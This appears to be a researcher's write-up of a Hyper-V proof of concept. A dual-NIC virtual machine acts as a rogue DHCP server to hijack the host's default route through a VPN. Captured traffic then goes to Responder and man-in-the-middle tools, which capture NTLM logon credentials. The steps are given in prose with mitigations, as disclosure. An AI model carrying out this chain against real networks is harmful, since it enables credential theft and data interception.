Microsoft has confirmed there is a mitigation already in place by going to settings for a VM go to Network Adapter -> Advanced Features -> DHCP Guard and enable it. "It is not disabled by default due to it being a performance impact"?
I personally powershell to just disable DHCP on the interface. Like: "Set-NetIpInterface -ifindex 2 -Dhcp Disabled, where ifindex 2" where ifindex is the "Internal" vSwitch type.
The goal of this article is to show proof of concept how a Hyper-V virtual machine with a configuration of two NICs, one internal, one external(with internet access) can lead to a compromise of a Microsoft Domain, and exfiltration of your companies data.
- Windows Server 2012 R2, 2016, or Windows 10 Host with Hyper-V.
- VM Capable of doing DHCP server / NAT. (Tested OpenBSD and Windows Server 2016)
- VPN service of some kind with compatibility to the VM. We used OpenVPN / private VPS.
A new VM is deployed and handed over to a local administrator, or a VM is compromised from the outside and has this configuration. The VM is given two NICs. One on an external vSwitch giving it outbound internet access, and one connected to an internal switch giving it access to… whatever else it needs access to internally/privately.
Assuming the administrator has not made any modifications to the virtual network adapter that gets created on the host itself when creating the internal vSwitch type, and leaving it set to “Obtain Automatically” for DHCP / DNS settings.
On OpenBSD this was extremely easy. We setup a simple DHCP config to hand out addresses 192.168.10.100-200, statically assigning the internal interface as 192.168.10.1. We used 220.127.116.11, and 18.104.22.168 for DNS, but could easily install/configure our own DNS services to push to the clients as well. Setup sysctl for IPV4 forwarding, and applied a very simple pf.conf to handle the NAT. DHCP will give an address to the Hyper-V host on the virtual NIC it creates, and give the default route a metric of “15” to that route on Windows 10, “5” on Server 2012r2, and “10” on 2016 standard. Only on 2012r2 is this metric the same as the hosts normal default route. Eventually traffic did start flowing through the new dhcp pushed route, but did take a little longer.
On Windows Server 2016 we basically mimic’d this setup using 192.168.11.0/24 network. Installed DHCP and routing and remote access roles. Configured the DHCP server settings, and NAT through routing and remote access snap-ins. Then using powershell and a custom packaged version of OpenVPN client with certs and configs, pulled it down with powershell invoke-webrequest cmdlet. Installed and connected the VPN client to a VPS server in the Netherlands.
Once the VPN connection was active it modified the default route traffic of the VM to push all traffic through the VPN gateway. Verifying on the Hyper-V host that all traceroutes are hitting 192.168.11.1(Server2016 VM) first, then 10.69.69.1 (VPN gateway), then the next hop our of our VPS provider and onward to it’s destination across the internet. VM’s on the host were also affected by this route hijack.
To take it a step further, I stood up a Debian Wheezy box for the VPS, ported OpenVPN server config over it to it and got it working, tested all the above routing, and began installing tools. I stood up a Responder instance and started gathering data, as well as MITM and session hijacking attacks against traffic going through the Debian machine. I was able to capture windows logon credentials(NTLM) from the host / VM’s affected.
Still want to see how far down the rabbit hole this could go with more tools and attacks on the distant end. But this is the initial write up on the finding. As i continue testing I will update this article.